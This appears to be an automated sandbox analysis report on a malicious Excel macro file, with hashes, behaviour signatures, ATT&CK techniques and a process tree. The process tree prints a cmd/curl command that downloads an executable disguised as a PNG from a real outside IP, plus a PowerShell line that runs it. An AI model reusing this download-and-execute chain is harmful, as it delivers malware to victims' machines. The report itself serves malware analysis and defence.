Analysis

  • max time kernel
    148s
  • max time network
    35s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    21-07-2021 19:28

General

  • Target

    10a3c0dc25be73191ca2ea5dc2730e07e544d44549954244d0cb36a94bf6c446.xlsm

  • Size

    85KB

  • MD5

    15e98764d969ee310fb1cdda85a26862

  • SHA1

    718382bbcf75fd62c07ad276ff0201c62f9da1f6

  • SHA256

    10a3c0dc25be73191ca2ea5dc2730e07e544d44549954244d0cb36a94bf6c446

  • SHA512

    8b5879e67765a65c87e6137d43289c848cb279cd6cc36b732f265aabca463ff3efe50c2e8ac86e52e627e59c04908b31f4aa5b44df8f619cccdca2a3ffe43a85

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\10a3c0dc25be73191ca2ea5dc2730e07e544d44549954244d0cb36a94bf6c446.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe start-sleep 10; $x=$env:AppData+'\mYKCY.exe';Invoke-Expression $x
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1188
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c curl http://151.236.30.123/images/suntogether.png -o %appdata%\mYKCY.exe
      2⤵
      • Process spawned unexpected child process
      PID:1084

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1084-64-0x0000000000000000-mapping.dmp
  • memory/1188-70-0x0000000005240000-0x0000000005241000-memory.dmp
    Filesize

    4KB

  • memory/1188-104-0x0000000006610000-0x0000000006611000-memory.dmp
    Filesize

    4KB

  • memory/1188-69-0x0000000001EA0000-0x0000000002AEA000-memory.dmp
    Filesize

    12.3MB

  • memory/1188-103-0x0000000006600000-0x0000000006601000-memory.dmp
    Filesize

    4KB

  • memory/1188-65-0x00000000765F1000-0x00000000765F3000-memory.dmp
    Filesize

    8KB

  • memory/1188-66-0x0000000002360000-0x0000000002361000-memory.dmp
    Filesize

    4KB

  • memory/1188-67-0x0000000004770000-0x0000000004771000-memory.dmp
    Filesize

    4KB

  • memory/1188-68-0x0000000002650000-0x0000000002651000-memory.dmp
    Filesize

    4KB

  • memory/1188-63-0x0000000000000000-mapping.dmp
  • memory/1188-89-0x0000000006340000-0x0000000006341000-memory.dmp
    Filesize

    4KB

  • memory/1188-74-0x0000000005750000-0x0000000005751000-memory.dmp
    Filesize

    4KB

  • memory/1188-72-0x000000007EF30000-0x000000007EF31000-memory.dmp
    Filesize

    4KB

  • memory/1188-79-0x0000000006240000-0x0000000006241000-memory.dmp
    Filesize

    4KB

  • memory/1188-80-0x0000000006290000-0x0000000006291000-memory.dmp
    Filesize

    4KB

  • memory/1188-87-0x00000000063C0000-0x00000000063C1000-memory.dmp
    Filesize

    4KB

  • memory/1188-88-0x00000000064E0000-0x00000000064E1000-memory.dmp
    Filesize

    4KB

  • memory/2028-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/2028-61-0x0000000071CC1000-0x0000000071CC3000-memory.dmp
    Filesize

    8KB

  • memory/2028-60-0x000000002F4F1000-0x000000002F4F4000-memory.dmp
    Filesize

    12KB